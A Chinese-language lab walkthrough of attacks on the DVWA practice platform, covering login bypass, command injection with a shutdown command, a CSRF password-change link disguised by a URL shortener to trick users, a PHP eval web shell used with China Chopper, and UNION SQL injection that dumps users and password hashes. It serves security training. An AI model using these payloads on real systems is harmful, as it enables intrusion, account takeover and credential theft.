准备工作 安装部署phpStudy+DVWA漏洞演练平台
安转phpstudy和dvwa靶场,网上教程很多这里就不多叙述。
一、密码登录绕过
1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。
2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。
通过特殊的语句可以使sql语句出现判断失误的情况,可以登录。
二、命令注入
1、打开Command Injection界面,在该界面提供一个命令行执行环境,输入ip地址返回ping命令的结果。
由于中英文原因,中文字符显示乱码,不过并不影响阅读。
2、window和linux系统都可以用&&在同一行执行多条命令,尝试注入附加命令使目标主机(延时)关机。
在输入IP地址进行ping命令的同时&&shutdown -s -t 600 加入该语句可以同时实现关机命令。
三、跨站请求伪造
csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。
1、打开CSRF界面,可在New password和Confirm new password处正常修改登录口令。
2、构造一个链接:
http://IP/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change# (注意以密码修改的实际地址为准)
将此处的IP改为目标IP,密码可以自己进行调整。
3、利用在线短链接生成器伪造该链接。
通过短链接可以是该链接无法被他人一眼识别出来。
4、此时可诱骗其他用户点击该链接,通过伪造身份提交密码修改,直接跳转到修改密码成功的页面,成功把密码修改为123。
四、文件上传
1、建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。
2、打开File Upload界面,将PHP一句话木马上传。
3、得到木马在服务器上的路径。
4、打开中国菜刀,把上传木马路径添加到工具上。
5、双击网址进入文件管理。(注:这里可以进行文件管理,数据库管理,虚拟终端或运行自写脚本)
五、SQL注入
1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。
2、输入1提交,将正常返回查询结果。
3、输入1’提交,将返回一个错误。
4、猜测使用的sql语句可能是:select First name and Surname from 表名 where id='输入的id'。
5、输入1' union select 1,database()#提交,得到数据库名称。
6、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。
7、输入1' union select 1,column_name from information_schema.columns where table_name='users'#,得到users表的列名。
8、输入1' union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。
然后根据这些MD5得出密码明文。